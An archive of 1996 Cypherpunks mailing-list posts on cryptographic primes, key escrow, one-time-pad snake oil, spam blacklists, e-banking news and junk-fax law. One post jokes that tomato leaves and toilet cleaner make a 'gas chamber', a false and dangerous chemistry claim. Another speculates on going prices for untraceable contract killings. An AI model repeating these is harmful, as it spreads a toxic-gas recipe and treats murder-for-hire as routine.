A7 CC 31 E4 7E A3 36 13 93 F4 C9 06 89 51 F5 A7 From stewarts at ix.netcom.com Mon Sep 16 22:44:18 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 17 Sep 1996 13:44:18 +0800 Subject: forward secrecy in mixmaster Message-ID: <199609170326.UAA18494@dfw-ix7.ix.netcom.com> At 06:29 PM 9/12/96 +0000, paul at fatmans.demon.co.uk wrote: >Stewart> I think they chose a strong prime (form p = 2q+1, q prime), ... >Strong primes are no longer of any benefit for cryptographic >applications. You're probably right, for today's factoring techniques. For a key you're only planning to use for the next couple of years, you can pretty much ignore strong primes, unless you're stuck with 512-bit keys, in which case you need to glean any crumbs you can. But for a value that needs to last a long time, such as a Diffie-Hellman modulus that's going to be a default value in a standard, and which you're only going to generate once anyway, it makes sense to generate a strong prime in case factoring methods that are affected by it become popular again in the future. It also makes sense to turn loose a bunch of people using different primality tests just in case somebody gets lucky (e.g. crank the test long enough that the probability of non-primality is 10**-9 or 10**-12 instead of just 10**-6. >Implementing strong primes won`t make your code any less secure, it >will just take longer to create the keys and won`t gain you any >security, all the big boys are using elliptic curve factoring methods >now so you really have nothing to gain. Do Generalized Number Field Sieve and its friends count as elliptic curve methods? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From deviant at pooh-corner.com Mon Sep 16 22:54:09 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 17 Sep 1996 13:54:09 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] In-Reply-To: <199609161705.KAA26825@toad.com> Message-ID: On Mon, 16 Sep 1996, David K. Merriman wrote: > Date: Mon, 16 Sep 1996 10:05:27 -0700 (PDT) > From: "David K. Merriman" > To: cypherpunks at toad.com > Subject: Re: Snake Oil FAQ 0.4 [comments appreciated] > > To: cypherpunks at toad.com > Date: Mon Sep 16 12:05:17 1996 [usefull stuff rm'd] > > > > The phrase easy-to-use should not appear in proximity to one > > time pad, except in the context 'Easier key management than a one time > > pad!" > > > > I would also suggest that the generation of OTP 'pads' for users is > *highly* questionable. Who else is getting a copy of them, assuming they're > even valid? > Not to mention, the basic flaw of OTP.. if you have the only copy of the key, and the key is non-repetitive, how do you send the key to another person without being just as insecure as not encrypting it in the first place... almost any OTP claims are gonna be snake oil. --Deviant "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From tcmay at got.net Mon Sep 16 22:59:01 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 13:59:01 +0800 Subject: The GAK Momentum is Building... Message-ID: At 1:59 AM 9/17/96, David Lesher wrote: >Clarinet sez: > >OTTAWA, Sept. 16 (UPI) -- The federal government has chosen >Northern Telecom's data security software, Entrust { } Public-Key >Infrastructure (PKI)... for gov't use..... > >worth $7.3 million...... Add to this these items: -- the IBM GAK product -- the "Clipper IV" (or is it only Clipper III?) GAK announcement expected "soon" It seems that several of these announcements are happening at the same time, which I doubt is coincidental. As the Republican challenger (whose name escapes me at the moment :-}) is not making an issue out of this, and is not making any issues out of anything related to liberty issues as near as I can tell, Clinton and the national security establishment seem to have free rein (and reign) to deploy GAK> As Lucky pointed out, GAK now appears inevitable. There's probably still time to monkeywrench these schemes, though. A few Blaze- or Wagner/Goldberg-type hacks could undermine confidence in the Key Authority (not to be confused with the Port Authority, which I presume handles i/o port assignments). --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From deviant at pooh-corner.com Mon Sep 16 23:08:37 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 17 Sep 1996 14:08:37 +0800 Subject: That Evil Internet, Pt. XXIII In-Reply-To: <199609161708.NAA26581@pdj2-ra.F-REMOTE.CWRU.Edu> Message-ID: On Mon, 16 Sep 1996, Peter D. Junger wrote: > Date: Mon, 16 Sep 1996 13:08:20 -0400 > From: "Peter D. Junger" > To: Cypherpunks > Subject: Re: That Evil Internet, Pt. XXIII > [quote deleted] > > Or one can use the technique my father accidentally discovered when he > was in school and wanted to electrolyze water. He made himself a > cell out of a broken light bulb (and wired it in series with a good > light bulb) and then realized that he did not have any sulphuric acid > lying around to use as a catalyst. So he used table salt instead. > Don' foget to try Tomato leaves (high CN content) and lysol toilet bowl cleaner (mostly HCl) CN+HCl=Gas chamber for those who are un-enlightened. --Deviant You know you've been spending too much time on the computer when your friend misdates a check, and you suggest adding a "++" to fix it. From unicorn at schloss.li Mon Sep 16 23:13:02 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 14:13:02 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant). In-Reply-To: <9608168428.AA842894324@smtplink.alis.ca> Message-ID: On Mon, 16 Sep 1996 jbugden at smtplink.alis.ca wrote: > tcmay at got.net (Timothy C. May) wrote: > >"Saving for a rainy day," whether saving, investing, getting an education > (while others are out partying), preparing, etc., all takes effort and > commitment. If those who save and prepare are then told they have to pay > high taxes to support those who partied....well, the predictable effect > [...] is _more_ people in agony. When you tell people that a compassionate > society will meet their basic needs, a predictable fraction of them will choose > not to work hard and prepare themselves. > > Two questions, two observations: > Do you have health insurance? > Do you have life insurance? Yes, so? Yes, so? > I have commented on your line of reasoning before and and it still > seems to me that an important part of the discussion is missed. > Specifically, that anyone can "save for a rainy day" and still not be > able to provide for events that can always happen: Heart attack, stroke, > car accident, pinched nerve that leaves you in excruciating pain and > unable to work for several years. Understand what it is you are saying. You are saying that everyone on the planet has a right to health insurance and disability insurance whether they can afford it or not. This is folly. The result is serious moral hazard problems. See below. > I don't think that a reasonable person would argue that medical > insurance should be outlawed because everyone should take care of their > own needs. Perhaps not. A reasonable person will argue, however, that your rates should be reduced and you should be placed in a lower risk group based on criteria like employment, health history, marital status, number of dependents and so forth. (Charging the same premium for the 49 year old married non-smoking female accountant with two kids and the inner city 18 year old corner crack dealer is folly). This is called "Risk pool seperation." And while I may not argue for the prohibition of health insurance, I will argue for compulsary payments for insurance policies - and against socially funded insurance (Look up the term "moral hazard" - I'm not going to provide you with an insurance vocab course). Remember the original purpose of social security. A government fund which was self sustaining because it only gave out what was put in and gained by investment. > A social safety net is simply a form of health and life > insurance. Statistical arbitrage if you will. Yes, but not for the reasons you would cite. Social safety nets prevent rioting by the lower classes, revolution and general civil disorder because they appease the masses. Indeed this is a form of health and life insureance for the middle and upper classes. > By spreading the risk you > minimize the cost. Yes, some people will take advantage of the system. > But like a virus, a robust system should be able to withstand this form > of attack. This is absolutely silly. Speading the risk alone does nothing. The cost for those who can pay is increased, and the cost for those who cannot pay is made 0 (it already was 0 incidently). It is also the reason the taxpayers (and not the savings and loan community at large) were forced to bail out the failed financial institutions. Namely, because premiums were not tied to risk. The FDIC, as of last year in any event, charges a flat rate fee for all financial institutions. This is independent of any risk analysis of their investments. i.e., a financial institution that invests in trailor parks in Arkansas pays the same premiums for federal deposit insurance as a institution that invests in government issued debt instruments. (There is some ceiling for risk, but not a graduated system below the ceiling). The result was (is) an incentive to risky investments. If you are a financial institution and I tell you "I will charge you $1.00 to insure $1000.00 of low risk and low profit investments, but I will charge you a while $1.00 to insure $1000.00 of extremely risky but highly profitable option and currency investments" which one are you going to choose? (Hint, you're an idiot if you pick option #1). The reason the insurance fund was depleted is because there was no risk balancing built into the system. The premiums did not cover the losses. They would have if they were risk adjusted. Spreading the risk, by itself, does NOT reduce cost. You must properly PRICE risk. This is the distinction between insurance and welfare. I suggest that you read up on this topic carefully before you try to argue this subject. It makes you look rather clueless. Welfare merely hands out money for those who have not bothered or cannot afford insurance. The result is an INCREASE in cost (taxes) to those who are coughing up the cash so that they may support. (I might add that no one in the United States today is denied catastrophic health care. Emergency Rooms are not allowed by law to discharge an unstable patient. You could be a bum on the street and be treated very well by any global standards for a heart attack, stroke, car accident, etc. To argue, as you effectively do, that such people are somehow entitled to millions of dollars in medical care so that they may, e.g., get a heart transplant, is an untenable position). [Bloom County Nonsense removed] > Prend soin, > James > > [Bible excerpt awaiting review as a motivation for human decency.] > The ground of a certain rich man brought forth plentifully: And he thought > within himself, saying, What shall I do, because I have no room where to bestow > my fruits? And he said, This will I do: I will pull down my barns, and build > greater; and there will I bestow all my fruits and my goods. And I will say to > my soul, Soul, thou hast much goods laid up for many years; take thine ease, > eat, drink, and be merry. But God said unto him, Thou fool, this night > thy soul shall be required of thee: then whose shall those things be, > which thou hast provided? Read: What you don't spend, you must give away. (This of course ignores the benefits to society of investing in e.g., the stockmarket, or government debt, it also ignores the fact that anyone who manages to save and invest a pile of money after paying the effective 50% tax rate in the United States has already given up half or more of the value of his labor). > [excerpted from Luke 12:16-20, King James Version] "When you have nothing to say, consult the bible." - C.S. Lewis -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From liberty at gate.net Mon Sep 16 23:20:45 1996 From: liberty at gate.net (Jim Ray) Date: Tue, 17 Sep 1996 14:20:45 +0800 Subject: Spam blacklist project Message-ID: <199609170200.WAA13918@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: hallam at ai.mit.edu, cypherpunks at toad.com Date: Mon Sep 16 21:57:31 1996 Phill wrote: [interesting anti-spam idea.] > Of course I don't for a moment imagine that this will > be 100% effective. Without government regulation there will > always be slimeballs who send mail to people who don't want it. Your faith in big government, despite seemingly every bit of evidence possible to the contrary, astounds me sometimes. Churches, Mosques, etc. struggle mightily for this kind of thought pattern in believers, yet it comes to you naturally, in secular life. Truly a marvel, and on _this_ list, of all places. It has kept me from killfiling you, but I must occasionally express my awe at the power of faith to literally move mountains. There is a "regulation" (law) against [murder, selling/growing reefer, selling sexual services, assault, you name it] yet you'd never deny that these behaviors still exist, would you? Somehow, though, you still seem to manage to think that spamming slimeballs will just disappear with more regulations. It's astonishing. > The advantage of this scheme is that it would mean that > the spam industry can avoid regulation pressure and they can > deflect criticism. I thought that "The Hippie of Crime" proved that spammers, if slick enough, could deflect criticism from themselves without any government help. > Meanwhile recipients of unwanted spam have > a legitimate beef. Don't we already have a legitimate beef, though? [I like your idea, BTW.] In fact, in view of Ian's recent posting, don't we already have a law, too? JMR -- "I think I'll reattach my printer to this machine." Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj4FkG1lp8bpvW01AQFvzAQAlLcZV+zsFfsvGodK7uyJP2hxNgugWpwD qYV23LgwV2dU5NRb7TPbqhp9Z6R7J5YZ3DnA6QuLnvn0pKVFITIyhcq7Wn3zu4PK 5uQ3slYJof1nT3l79zDA6Xx/2pBUm4IxhYXsrw4z4jQFGWHl28rZ1JpbAWghCRcM b7JXzqaRnek= =AbJE -----END PGP SIGNATURE----- From rah at shipwright.com Mon Sep 16 23:24:15 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 17 Sep 1996 14:24:15 +0800 Subject: Report on security of e-money by BIS Message-ID: --- begin forwarded text Sender: e$@thumper.vmeng.com Reply-To: lvhove at vnet3.vub.ac.be (Leo Van Hove) Mime-Version: 1.0 Precedence: Bulk Date: Mon, 16 Sep 1996 10:39:14 +0100 From: lvhove at vnet3.vub.ac.be (Leo Van Hove) To: Multiple recipients of Subject: Re: Report on security of e-money by BIS >So, I am still keen on that report ... > >> No political recommandations. >(ok) >> Possibliy the report will soon be online. Meanwhile it should be >> possible to order a copy at www.bis.org. > >but the site has no email address or ordering info. The report >is not listed as far as I could see. As I have a scanner, I >shall attempt to secure a paper copy, but it looks like recourse >to historical methods of communications is called for. Now, how >does one operate this push-button dial thingy... > >-- >iang >iang at systemics.com Found the following on the FRB of New York site at http://www.ny.frb.org/pihome/news/g10.html --- SECURITY MEASURES FOR ELECTRONIC MONEY ARE EFFECTIVE, G-10 TASK FORCE REPORTS NEW YORK -- Existing security measures to protect electronic money products, when implemented correctly, can provide consumers and issuers adequate protection from fraud, according to a report by G-10 central bank computer and security experts. The report, issued through the Bank for International Settlements, was prepared by *** This report will be available in its entirely on this site in the near future.*** --- leo _________________________________________________________________________ Leo Van Hove Centre for Financial Economics Vrije Universiteit Brussel (Free University of Brussels) Pleinlaan 2 B-1050 Brussels vox: +32 2 629.21.25 fax: +32 2 629.22.82 e-mail:lvhove at vnet3.vub.ac.be home page: http://cfec.vub.ac.be/cfec/leo.htm _________________________________________________________________________ --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From dlv at bwalk.dm.com Mon Sep 16 23:31:14 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 14:31:14 +0800 Subject: Spam blacklist project In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu> Message-ID: <7aLDuD77w165w@bwalk.dm.com> hallam at ai.mit.edu writes: > The following idea just hit me. How about a server which > maintained a list of people who don't want to recive SPAM? The idea > being that email recpients who don't want SPAM send their email > address to the list. A SPAMer who want to check an email to see > if it is on the list could then obtain the SHA-Digested list of > addresses and remove them from their internal databases. > > Of course I don't for a moment imagine that this will > be 100% effective. Without government regulation there will > always be slimeballs who send mail to people who don't want it. > > The advantage of this scheme is that it would mean that > the spam industry can avoid regulation pressure and they can > deflect criticism. Meanwhile recipients of unwanted spam have > a legitimate beef. I proposed this very idea on Usenet a few weeks ago. Apparently the folks who send out spam e-mail (DEMMA) like it very much. (They're not masochists -- they don't want to mail people who'll mailbomb them right back or complain to their postmasters or otherwise make their lives miserable :-) Such a list should be maintained by a neutral third party, not by one of the junk-mailers for two reasons: they can't really be trusted, and their plugs get pulled all the time. Note that I also proposed making freely available lists of people who said they _do want to receive junk mail on various topics - to make *selling* such lists meaningless. I'll repost some excerpts from the Usenet thread to give you some idea of what's been discussed already, and what kind of discussion it was. 1. From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Message-ID: A user asks a 'bot for a random cookie. The user e-mails the 'bot the cookie (for authentication) and his preference for unsolicited commercial junk e-mail: wants it, doesn't want it, or doesn't care The 'bot maintains an FTP site with 2 compressed lists of e-mail addresses: people who said they want junk e-mail and people who said they don't want it. (No list for "don't care's" is needed.) An advertiser preparing a mass e-mail campaign should take care not to e-mail the addresses that don't want junk e-mail. (A mailing list scrubbing tool should be provided.) Bothering people on this list would be a serious net-abuse On the other hand, sending unsolicited commercial e-mail to people who told the 'bot they want it, or who haven't bothered to tell the 'bot they don't want junk mail, is not net-abuse. Like it or not, if you post to Usenet, you can expect junk e-mail coming your way. It's your responsibilty to make it known that you don't want unsolicited commercial e-mail 2. From: clewis at ferret.ocunix.on.ca (Chris Lewis) Message-ID: >I remind everyone of Dr. Grubor's brilliant proposal. (I will type slowly, >so that even the Cabal can understand.) Grubby's "brilliant proposal" isn't really Grubby's. It's been made by several spammers over the months. Eg: Slaton. Tyrell's InsideConnections. The "Direct Email Marketing Association". 3. From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Message-ID: References: >>but if they agree to abide by his list and not to e-mail >>the people who indicated their desire not to be e-mail, it's just wonderful! > >They won't. >From what I know of Slaton, I don't expect him and his associates to send unsolicited commercial e-mail to addresses that indicate to him that such e-mail is unwelcome >>I get junk mail; I also see bounced junk mail addressed to nonexistent accounts >>like "antivulis at bwalk.dm.com" (used for forgeries by your pal Pidor Vorobiev). >>Sometimes the junk mail tells the recepient to e-mail some address to be >>removed from a mailing list. I tried it a few times, but the address would >>always be defunct by then. > >Exactly. You sound proud of the fact that there's no mechanism for me to let Slaton know that I don't want to receive unsolicited commercial e-mail? >>It's particularly >>inexcusable if you're telling the truth and Slaton&co have indeed agreed to >>abide by the "don't-mail" requests. > >I didn't say that they _do_ abide by them. Of course they can't now There is no FTP site where a spammer can get (for free) the list of addresses to which junk e-mail shouldn't be sent. Nor is there a user-friendly way to add one's address to this "don't e-mail" list - yet >Even when they've invented the "don't-mail" process themselves, they >don't abide by them. Slaton just used it as a means to extort money - >he never intended to actually respect it. Slaton&co shouldn't be the one maintaining the list of addresses that don't want junk e-mail. A deamon should do it, and the service should be free. By the way I don't recall Slaton asking anyone to pay for not being e-mailed. Unless you provide a quote, I'll assume you made this up. >>>And you know what? Not a single spammer uses any one of them. Including >>>Slaton or Tyrell. They just sell the lists to other spammers. > >>Please explain how the spammers would _sell each other the list of >>addresses of people who DON'T want junk e-mail if it were _freely available >>for FTP. I think you overestimate their talent for salesmanship. :-) > >It's called "fraud". They'd do it exactly the same way that Slaton sells >his "products" and "services" which are known to (a) not work, and (b) >aren't supported as promised. You haven't answered my question, Lues. If the list of e-mail addresses of people who DON'T want junk e-mail is made available for _free for FTP, together with a tool for spammers to scrub their mailing lists of these addresses, and an easy way for anyone to add his or her address to this list for _free, then how would Slaton _sell this list to anyone? From dlv at bwalk.dm.com Mon Sep 16 23:53:21 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 14:53:21 +0800 Subject: Something crypto-financially relevant for a change Message-ID: C-punks, I have somr wire clippings that I think are more relevant to this list's stated topic that the constant personal attacks, rants, and newbie questions. I don't have the resources to send them out on request like JYA does. Would anyone be interested in my sending more materials like this to this list? BANKS BANK ON INTERNET Internet banking is poised for a rapid growth in Europe according to a survey of the European banking industry by Booz Allen & Hamilton. Thirty seven banks took part in the survey, which found that 80% were planning to upgrade existing Web sites to incorporate most traditional banking transactions within three years. There was also signs of the emergence of the first Internet-only banks. Wide-spread concerns about security are more an issue of perception than of real obstacles, according to Claus Nehmzow, a principal of BAH. The survey predicts that over the next five years 2,000 European banking institutions will be online. -- New Media Age, 9/12/96 IBM TEAMS WITH 15 BANKS TO FORM INTEGRION FINANCIAL NETWORK Fifteen of North America's leading banks and IBM today announced the formation of Integrion Financial Network. Beginning in early 1997, Integrion will offer a broad range of interactive banking and electronic commerce services to banks in the U.S. and Canada. Representing over half the retail banking population in North America, over 60 million households, Integrion will be owned and operated by IBM and the member banks (ABN AMRO, BANC ONE, Bank of America, Barnett Bank, Comerica, First Bank Systems, First Chicago NBD Fleet Financial Group, KeyCorp, Mellon Bank, Michigan National Bank, NationsBank, PNC Bank, Royal Bank of Canada and Washington Mutual). This ownership structure enables banks to play a central role in determining the manner and format in which these services are offered to their customers, ensuring that electronic banking services are consistent with the bank's full range of services, are branded by the bank, and that the bank's customers receive maximum benefit. -- Business Wire, 9/9/96 IN CHECK FRAUD WAR, SIMPLE IDEA MAKES ITS MARK In Texas, Nevada, Arizona and more than a dozen other U.S. states, bankers are fighting check fraud by equipping tellers with ink pads so they can affix the thumbprint of customers who are not regular patrons of the bank to the backs of checks they cash. Banks lose millions each year to organized crime and gang members who steal checks or duplicate payroll checks and then cash them. These crimes cost banks $815 million in 1993 alone, more than 12 times what they lost in robberies, according to American Bankers Association statistics. Said Dawn Duplantier of the Texas Bankers Association, which began selling its member banks the pads last December, "Across the board in the first six months, we have had a 70% decrease" in check fraud," she said. Bank of America, the third-largest U.S. bank, began taking prints at 43 of its branches in Nevada in 1994. Since then the bank has seen a 40% to 60% decline in check fraud, said Robert Randolph, liaison officer for the bank's investigative services division. -- Int'l Herald Tribune, 9/7/96 DAIWA SECURITIES SELLS U.S. GOVERNMENT SECURITIES OVER INTERNET Daiwa Securities America has expanded its trading room into cyberspace by allowing dealers to negotiate purchases and sales of U.S. government securities through the Internet, the worldwide computer network. The move will let clients log on to the bank's network using any Internet Service Provider and effectively close a deal online. Clients can access Daiwa's network through the bank's Web site -- located at http://www.oddlot.com -- and from t here place their buy or sell orders. To skirt the security holes, Daiwa is using several mechanisms, ranging from Internet firewalls to Secure ID cards, in an effort to prevent hackers from placing rogue or phony deals into the system. "Anybody can hook up to our Web site, but they can only get as far as our firewall. Then they have to have a Secure ID card and an account open with Daiwa," a spokesman said. The "secure IDs" are in fact small electronic cards that give the user an entrance code, which change s every 60 seconds, to a computer network. The system is now available only for financial institutions and brokerage houses interested in dealing with Daiwa. No individuals are allowed to open personal accounts and trade using the system at this point. -- Reuter, 9/6/96 BANKS SHOULD PREPARE TO CASH IN ON E-CASH According to a new study by Killen & Associates, banks can regain the leadership position in payments by leveraging their payment transaction infrastructure to support electronic cash (E-cash) services. "By 2005, E-cash transactions will escalate to almost 30 billion," stated Michael Killen, president of the market research firm. "Non-banks see this as a new opportunity to carve further market share away from the banking industry. All will compete for new revenue streams including Internet-based micropaym ents and 'by the byte electronic commerce purchasing services. E-cash, including secured credit/debit cards, stored-value cards, smart cards, ATM derivatives, and other forms, is less expensive for business than handling cash or standard credit cards and more secure than checks," Killen continued. "Opportunities will open for financial and other product and services players, including ATM vendors; ATM/POS terminal manufacturers and network suppliers, including bank-owned networks, American Express, Deluxe, ACS, and VeriFone; and cash handling/cash management services firms." -- Business Wire, 9/4/96 THE CHECK IS NOT IN THE MAIL The federal government must stop using checks by Jan. 1, 1999. Can the rest of us be far behind? A quarter-century ago digital visionaries were predicting the checkless society, and the number of checks written in the U.S. has tripled since then, to 61 billion in 1995. But one day, the predictions will come true, and that day moved closer with a little-noticed provision in April's federal budget compromise. It will force the biggest check writer of all -- the U.S. government -- to abandon paper checks almo st entirely by Jan. 1, 1999. After that, virtually all 1 billion federal payments made each year, including Social Security, must be made through electronic funds transfers. Yet, 90% of U.S. banks, and some federal agencies, aren't capable of electronically transmitting and receiving key information that accompanies vendor payments. The new law will force them all to get moving. -- Forbes, 9/9/96 --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From wombat at mcfeely.bsfs.org Mon Sep 16 23:54:45 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 17 Sep 1996 14:54:45 +0800 Subject: Forwared message from Pres. of juno.com Message-ID: Just thought I'd pass this along. I had jumped all over Juno on the list after the "talker" started, and tarred all of juno with the same brush. I was rather harsh on a company that I really don't know all that much about, except by judging a small sample of its clients. Sorry, Charles, and good luck with the grand social experiment. - r.w. ---------- Forwarded message ---------- Date: Fri, 13 Sep 1996 15:25:58 -0400 From: Charles Ardai To: Rabid Wombat Subject: Annoying spam incident(s) Hi. Your posting to cypherpunks was brought to my attention, and I wanted to take a minute to respond. (I also forwarded a copy of it to "postmaster at juno.com", where we have a (small) staff of people to deal with incidents like the one you ran into. If you run into more in the future, please e-mail the information to that address.) Since this is not directly relevant to cypherpunks, I'm replying directly to you, but you are welcome to forward this note to the list if you want. > Complaints about spamming and cross-posting probably won't get you far, > either. On-Net spamvertizing seems to be their source of revenue. Perhaps > shaw.net needs to be contacted instead. A couple of clarifications: Juno has never sent a single piece of spam and, as long as I have anything to say about it, never will. We provide a free e-mail service which is paid for by advertising, but the advertising takes the form of graphical banners built into Juno's custom interface and the ads only appear on the screens of Juno's members. We have never sent any ads by e-mail, and have never sent any online ads of any sort to anyone who was not one of our members. What's more, we expressly prohibit the use of Juno to transmit commercial solicitations in the Service Agreement that all members have to accept before they can create a Juno account. When we hear about violations, we investigate and (if it seems appropriate) take actions up to and including terminating a violator's account on our service. Needless to say, we do not read or in any way screen the mail our members send or receive, so until we hear about a spamming incident we have no way to prevent a particular piece of spam from being transmitted; but I promise you we do listen to the complaints we receive and act on them as quickly as we responsibly can. In short, we do not send spam, we do not tolerate spam, and we will not allow our service to become a home to spammers. Note that today we supply e-mail to more than 400,000 members, and over 6000 people create Juno accounts every day. At this rate of growth, we can expect to have millions of members by this time next year. The vast majority of our members use our service responsibly; it's only a fraction of a fraction of one percent who send spam. I appreciate your frustration at dealing with these abusers of our service -- and believe me, they don't frustrate you half as much as they do us -- but I ask that you not penalize the hundreds of thousands of responsible Juno members (and those users of your network who want to communicate with them) because of the actions of the handful of miscreants doing their best to give us a bad name. Juno has no more (and, alas, no less) spam-producing potential or control over the spam its members send than Netcom, AOL, CompuServe, or any other e-mail provider. (We're slightly better, perhaps, because Juno currently offers its members no tools for direct posting to newsgroups or information about mail->news gateways, and slightly worse because it is possible to get a Juno account without having to give us a credit card number.) By shutting off access to your network by our members' mail you hurt the spammers only minimally -- they'll find another address elsewhere and spam again, I'm afraid -- but may hurt Juno quite a lot. And since we're the only major provider of free e-mail in the country today, I'd hate to see the service needlessly or inappropriately hurt. (I also have personal reasons, of course, for not wanting to see Juno hurt.) I apologize for the length of this message, and if we have been unresponsive to your past complaints I apologize for that as well. If you have any questions, please don't hesitate to contact me directly. Best regards, Charles Ardai President Juno Online Services, L.P. From sbryan at maroon.tc.umn.edu Mon Sep 16 23:57:25 1996 From: sbryan at maroon.tc.umn.edu (Steve Bryan) Date: Tue, 17 Sep 1996 14:57:25 +0800 Subject: 56 kbps modems In-Reply-To: <9609161402.AA11975@srzts100.alcatel.ch> Message-ID: >Speaking of ISDN, how many people, can afford to have a personal ISDN >line in there house? And then afford to connect to something/someone >else on a next to permanent basis monthly? As I write this message I'm in the last day of my ISDN service for now. When I was doing independent consulting work I installed ISDN at my office. This was to facilitate connectivity to work in California from Minnesota. After taking a job working for a company locally in Minneapolis I succumbed to the temptation of installing ISDN at my home and moved my Combinet router home. I won't deny that I'll be giving up considerable convenience since the ISDN connection has the ability to come up quickly and automatically as I send packets to external destinations (that's in theory, your mileage can vary considerably). But the price per month is ridiculous for the marginal improvement in connectivity I get over my U of M account that only costs me about $100 per year. For the price I'm paying for ISDN Internet connectivity I could buy 32 meg of memory or a gigabyte drive every month. The driving force in my decision is the continuing improvement in modem speeds. When I started with ISDN, my modem speed was 9600 and plenty finicky at that. Now you can get 33.6 modems for less than $200. _________________ Steve Bryan sbryan at gofast.net From tcmay at got.net Tue Sep 17 00:42:47 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 15:42:47 +0800 Subject: Judge Kozinski Responds Message-ID: At 9:21 PM 9/16/96, Jim Ray wrote: >I have been having a private e-mail conversation with Judge Alex Kozinski of >the 9th circuit. Today he said: >>Halloween, it only really works when the people dressed up >>are about four feet tall. In the rare instances where there >>have been adults at my door that were so disguised you >>couldn't tell who they were, I felt threatened--kept my >>Glock handy before opening door. I'll only comment on this one item, for now. Any judge who talks about keeping his Glock handy has my vote. (Of course, I've heard of such things many times before. Chief Supreme Warren Burger once got a lot of publicity by answering his door--in D.C.--with a revolver in one hand. I suspect that an awful lot of judges fully appreciate the kind of perps that are out there, and know the threats they could face, both from random acts of violence and home invasion and from targetted acts of revenge. As they learn that perps they send away to prison are requesting archived copies of "Assassination Politics," I rather expect their paranoia will increase sharply.) (Hint: One reason I seldom discuss AP is that to me it's just a special case of the larger issue of untraceable markets for such acts, something I've been worried about for almost a decade now. There is little reason to engage in the fiction of a "betting pool" when a hit may be untraceably contracted for and the standard fee ($1000 or less in some inner cities, $5000 for ordinary suburbanites, $30,000 or more for high-profile cases...so I hear) be paid with untraceable cash...as soon as truly untraceable digital cash becomes a reality.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rjj at medialab.com Tue Sep 17 00:46:19 1996 From: rjj at medialab.com (Richard Johnson) Date: Tue, 17 Sep 1996 15:46:19 +0800 Subject: Unsolicited email advertising already illegal in US? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 15:54 9/16/96, Ian Goldberg wrote: >This piece from RISKS looks interesting. My computer certainly _is_ > > "equipment which has the capacity to transcribe text or images > (or both) from an electronic signal received over a regular > telephone line onto paper." > >Now, are HipCrime et al. liable for $500 in damages for each piece of spam? >If so, where do I sign up? The intent of that law is to prevent the shifting of advertising costs to the unwilling recipients of junk faxes. (The $500 per message damages figure is what prompted me to raise my proofreading rates to $500 per message.) Twisting this law to apply it to junk email sent to computers with carefully selected peripherals and net connections is certainly following that anti-cost-shifting intent. Quite amazing, that, to twist a law so cruelly and at the same time follow its intent. However, which way a judge would jump on it remains to be seen. One source considers its application to junk email to be unlikely, because in essence it's too much of a twist. See: http://www.ca-probate.com/faxlaw.htm for another copy of the law, and http://techweb.cmp.com/net/issues/036issue/036law.htm for an opinion that actual application of the law to junk email is unlikely. Richard -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj4YF/obez3wRbTBAQEHVQQAgP+35ZmOpsw1A7VsMHAONCFL4c5+xXSI 8NR9bibFZ+X+vNRSgp8KsEH2JyUk3g50ygYWx8DrzC0jhDdu902VTTN9lI92RJf5 66P5mzOCIzbfULra7wy4nSjfGR7vRTNrvY3y5fKodDvPRekkd8TcBSn/aPW/ONRa Gk/AbxKd6Cc= =qTcT -----END PGP SIGNATURE----- -- "As the most participatory form of mass speech yet developed, the Internet deserves the 